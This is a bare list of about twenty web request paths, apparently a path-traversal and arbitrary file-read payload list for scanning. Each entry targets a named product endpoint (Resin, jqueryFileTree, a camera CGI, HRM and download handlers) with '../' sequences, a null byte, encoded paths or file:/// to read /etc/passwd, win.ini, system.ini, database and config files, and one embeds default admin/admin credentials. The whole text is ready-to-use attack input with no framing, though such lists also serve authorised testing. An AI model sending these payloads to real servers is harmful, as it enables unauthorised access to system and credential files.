/services/getFile.cmd?userfile=config.xml
/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini
/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
/file?valore=../../../../../windows/win.ini
/download/C%3a%2fwindows%2fsystem.ini
/index/download/index?name=index.php&url=../../application/database.php
/_admin/imgdownload.php?filename=imgdownload.php
/home/000~ROOT~000/etc/passwd
/000~ROOT~000/etc/passwd
/OLDS/home/000~ROOT~000/etc/passwd
/app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd
/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd
/%20../web-inf/
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
/resin-doc/viewfile/?file=index.jsp
/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8
/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
